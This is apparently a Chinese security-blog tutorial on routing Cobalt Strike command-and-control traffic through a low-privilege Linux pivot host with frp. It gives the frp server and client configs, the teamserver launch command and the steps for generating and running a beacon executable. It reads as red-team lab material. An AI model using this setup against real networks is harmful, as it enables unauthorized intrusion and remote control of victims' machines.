微信公众号:乌鸦安全
扫取二维码获取更多信息!
01 背景介绍在使用cobalt strike的场景中,很多时候会遇到内网机是Windows不出网,而外网机是Linux的,而且外网机只能获取到低权限来转发流量。如果此时想使用cobalt strike来横向的话,需要使用Linux机器作为跳板机来进行操作。
02 环境配置此次使用frp进行流量转发。
注意:因为以前使用的其他机器进行操作,所以在这里的部分ip地址有变动和打码。
2.1 跳板机_192.168.3.3直接配置服务端
./frpc -c frpc.ini
其中frps.ini的配置信息(默认)
[common] bind_port = 7000
运行起来
2.2 攻击机mac_192.168.3.2命令启动:
./frpc -c frpc.ini
其中frpc.ini配置
server_addr的地址为Linux服务器的地址:192.168.3.3
[common] server_addr = 192.168.3.3 server_port = 7000 [CS_Server_9050] type = tcp local_ip = 127.0.0.1 local_port = 50050 remote_port = 9050 [test_Beacon_9080] type = tcp local_ip = 127.0.0.1 local_port = 9080 remote_port = 9080
其他的信息不变
当运行成功之后,云服务器端会显示建立连接
此时搭建完成
2.3 cobaltstrike 服务端直接使用本地的局域网ip进行启动 192.168.3.2
sudo ./teamserver 192.168.3.2 123
在这里可以看到端口是50050,此时的端口要和上面的frp端口对应
因为这个端口的流量转发给了Linux的9050端口
2.4 cobaltstrike 客户端打开之后,这里需要使用Linux的ip和端口来操作
当连接建立之后,frp会有反应
此时成功将内网的CS使用frp进行了穿透
接下来就是攻击测试了
03 攻击测试 3.1 设置监听cobaltsrike进行如下测试:
此时如下:
3.2 上线测试选择生成exe
选择监听器
保存exe
传上去之后,直接点击上线
成功



